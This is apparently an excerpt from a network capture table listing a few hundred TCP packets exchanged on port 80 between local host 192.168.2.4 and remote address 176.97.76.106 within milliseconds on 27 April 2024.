Apr 27, 2024 00:46:06.388444901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388453960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388469934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388492107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388495922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388521910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388550043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388561964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388590097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388623953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388641119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388665915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388695955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388717890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388731003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388765097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.388791084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388803959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.388834000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.390477896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390531063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390543938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390563965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.390585899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390620947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.390810013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390858889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390873909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390892029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.390929937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.390964985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.390979052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391011953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391048908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391071081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391083956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391113997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391134977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391180038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391215086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391215086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391268969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391280890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391298056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391333103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391374111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391392946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391408920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391443014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391444921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391458988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391494036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391504049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391516924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391549110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391558886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391628027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391664028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391699076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391711950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391737938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391743898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391789913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391802073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391823053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391846895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391870022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391885042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391901970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391917944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391937017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.391963959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.391997099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392002106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392061949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392096043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392129898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392143965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392178059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392210007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392271042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392306089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392354965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392362118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392374992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392386913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392389059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392421007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392433882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392458916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392503023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392508030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392539024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392577887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392585039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392617941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392654896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392657042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392680883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392716885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392736912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392785072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392807961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392821074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392854929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392893076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392900944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392914057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392945051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.392980099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.392997026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393030882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393052101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393065929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393095970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393117905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393141031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393172026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393193007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393223047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393265963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393280029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393311977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393347979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393348932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393373013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393414021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393435001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393493891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393507004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393531084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393548965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393579006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393582106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393639088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393675089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393687010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393699884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393724918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393738985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393773079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393811941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393811941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393858910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393892050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393910885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393923044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393959999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.393969059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.393992901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394026995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394052029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394098997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394134998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394135952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394186974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394223928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394227028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394268036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394304991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394325972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394372940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394412994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394412994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394483089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394495964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394506931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394522905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394543886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394548893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394602060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394635916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394670010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394707918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394721031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394733906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394740105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394746065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394766092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394795895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394809961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394823074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394825935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394845009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394865036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394884109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.394918919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.394941092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395018101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395050049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395071030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395116091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395133972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395145893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395152092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395169020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395184040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395207882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395242929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395265102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395299911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395338058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395351887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395376921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395411968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395435095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395448923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395462990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395483971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395504951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395539999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395562887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395576000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395606041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395606995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395684958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395709991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395720959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395730972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395761013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395767927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395781994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395812035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395828009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395840883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395853043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395869970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395919085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395934105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395945072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395953894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395956993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.395975113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.395998955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396037102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396039009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396087885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396117926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396120071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396167994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396187067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396202087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396204948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396225929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396235943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396239042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396250963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396269083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396291018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396302938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396322012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396327972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396341085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396352053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396358967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396363974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396382093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396406889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396437883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396461010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396505117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396541119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396549940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396563053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396574974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396591902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396598101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396610022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396631002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396661997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396676064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396687031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396698952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396722078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396745920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396759987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396791935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396820068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396832943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396842957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396857977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396864891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396878004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396893024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396945953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396960020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.396980047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.396996975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397011042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397025108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397037983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397039890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397056103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397079945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397092104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397109985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397123098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397145987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397161007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397192001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397228003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397248030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397274971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397310972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397332907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397346020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397356987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397368908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397377014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397382021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397398949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397403955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397416115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397432089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397455931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397486925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397500992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397546053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397582054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397599936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397667885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397680044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397691011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397701979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397701979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397725105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397727013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397737026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397756100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397775888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397790909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.397810936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.397825003 CEST	80	49734	176.97.76.106	192.168.2.4
